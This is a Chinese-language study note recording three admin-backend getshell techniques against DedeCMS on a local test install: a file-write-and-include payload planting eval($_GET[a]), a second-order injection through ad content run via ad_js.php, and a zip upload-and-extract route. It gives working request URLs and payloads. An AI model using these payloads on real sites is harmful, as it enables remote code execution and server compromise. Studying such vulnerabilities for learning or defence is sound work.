1、通过fopen/fwrite配合require_once文件包含进行getshell
D:\phpstudy_pro\WWW\dede\dede\sys_verifies.php
payload:http://dede.com/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//

此处进行文件包含,最终导致getshell
http://dede.com/dede/sys_verifies.php?action=down&a=echo 'zpchcbd';

类似的漏洞还有:D:\phpstudy_pro\WWW\dede\dede\stepselect_main.php 中的WriteEnumsCache函数
2、二次注入导致的getshell
D:\phpstudy_pro\WWW\dede\dede\ad_add.php
进行广告添加的时候,其中$normbody变量是我们可以可控,这里直接写入的内容为--><?php phpinfo()?><!--

后面发现会进行取出,如果看从哪里取出呢?全局搜索#@__myad,这个表的相关操作
D:\phpstudy_pro\WWW\dede\plus\ad_js.php,发现在这会进行取出,并且进行文件包含,--> <!-- 就是为了闭合操作

然后访问:http://dede.com/plus/ad_js.php?aid=3,这里我的广告id为3
直接命令执行

3、压缩包上传解压导致的getshell
随意上传一个附件:http://dede.com/uploads/soft/200420/1_2312144661.zip
访问:http://dede.com/dede/album_add.php,进行解压操作!

这三种都是经典的后台getshell的方法,在这里学习记录下!
